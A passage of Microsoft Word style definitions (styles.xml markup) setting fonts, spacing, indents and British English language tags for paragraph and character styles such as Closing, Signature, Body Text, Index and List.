    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Closing">
    <w:name w:val="Closing"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Signature"/>
    <w:link w:val="ClosingChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="5103"/>
      </w:tabs>
      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="5103"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ClosingChar">
    <w:name w:val="Closing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Closing"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Signature">
    <w:name w:val="Signature"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Contact"/>
    <w:link w:val="SignatureChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="5103"/>
      </w:tabs>
      <w:spacing w:before="1200" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="5103"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SignatureChar">
    <w:name w:val="Signature Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Signature"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Text2"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="454"/>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="454" w:hanging="454"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet3">
    <w:name w:val="List Bullet 3"/>
    <w:basedOn w:val="Text3"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
        <w:tab w:val="num" w:pos="2268"/>
      </w:tabs>
      <w:ind w:left="454" w:hanging="454"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet4">
    <w:name w:val="List Bullet 4"/>
    <w:basedOn w:val="Text4"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="454" w:hanging="454"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContinue">
    <w:name w:val="List Continue"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="567"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContinue2">
    <w:name w:val="List Continue 2"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="851"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContinue3">
    <w:name w:val="List Continue 3"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1134"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContinue4">
    <w:name w:val="List Continue 4"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1418"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContinue5">
    <w:name w:val="List Continue 5"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1701"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber2">
    <w:name w:val="List Number 2"/>
    <w:basedOn w:val="Text2"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="720" w:hanging="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber3">
    <w:name w:val="List Number 3"/>
    <w:basedOn w:val="Text3"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="720" w:hanging="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber4">
    <w:name w:val="List Number 4"/>
    <w:basedOn w:val="Text4"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="720" w:hanging="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PlainText">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PlainTextChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PlainTextChar">
    <w:name w:val="Plain Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="PlainText"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofAuthorities">
    <w:name w:val="table of authorities"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="240" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="482" w:hanging="482"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOAHeading">
    <w:name w:val="toa heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BlockText">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1440" w:right="1440"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText2">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyText2Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyText2Char">
    <w:name w:val="Body Text 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText2"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyText3Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyText3Char">
    <w:name w:val="Body Text 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText3"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextFirstIndent">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="BodyText"/>
    <w:link w:val="BodyTextFirstIndentChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:firstLine="210"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextFirstIndentChar">
    <w:name w:val="Body Text First Indent Char"/>
    <w:basedOn w:val="BodyTextChar"/>
    <w:link w:val="BodyTextFirstIndent"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndentChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndentChar">
    <w:name w:val="Body Text Indent Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextFirstIndent2">
    <w:name w:val="Body Text First Indent 2"/>
    <w:basedOn w:val="BodyTextIndent"/>
    <w:link w:val="BodyTextFirstIndent2Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:firstLine="210"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextFirstIndent2Char">
    <w:name w:val="Body Text First Indent 2 Char"/>
    <w:basedOn w:val="BodyTextIndentChar"/>
    <w:link w:val="BodyTextFirstIndent2"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent2">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndent2Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndent2Char">
    <w:name w:val="Body Text Indent 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent2"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent3">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndent3Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndent3Char">
    <w:name w:val="Body Text Indent 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent3"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DocumentMap">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DocumentMapChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DocumentMapChar">
    <w:name w:val="Document Map Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="DocumentMap"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="EndnoteReference">
    <w:name w:val="endnote reference"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EnvelopeAddress">
    <w:name w:val="envelope address"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:framePr w:w="7920" w:h="1980" w:hRule="exact" w:hSpace="180" w:wrap="auto" w:hAnchor="page" w:xAlign="center" w:yAlign="bottom"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="2880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EnvelopeReturn">
    <w:name w:val="envelope return"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="240" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="480" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="960" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1200" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1440" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index7">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1680" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index8">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1920" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index9">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="2160" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IndexHeading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Index1"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="LineNumber">
    <w:name w:val="line number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List">
    <w:name w:val="List"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="283" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List2">
    <w:name w:val="List 2"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="566" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List3">
    <w:name w:val="List 3"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="849" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List4">
    <w:name w:val="List 4"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1132" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List5">
    <w:name w:val="List 5"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1415" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="MessageHeader">
    <w:name w:val="Message Header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="MessageHeaderChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>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hAnsi="Arial"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MessageHeaderChar">
    <w:name w:val="Message Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="MessageHeader"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:shd w:val="pct20" w:color="auto" w:fill="auto"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalIndent">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoteHeading">
    <w:name w:val="Note Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="NoteHeadingChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
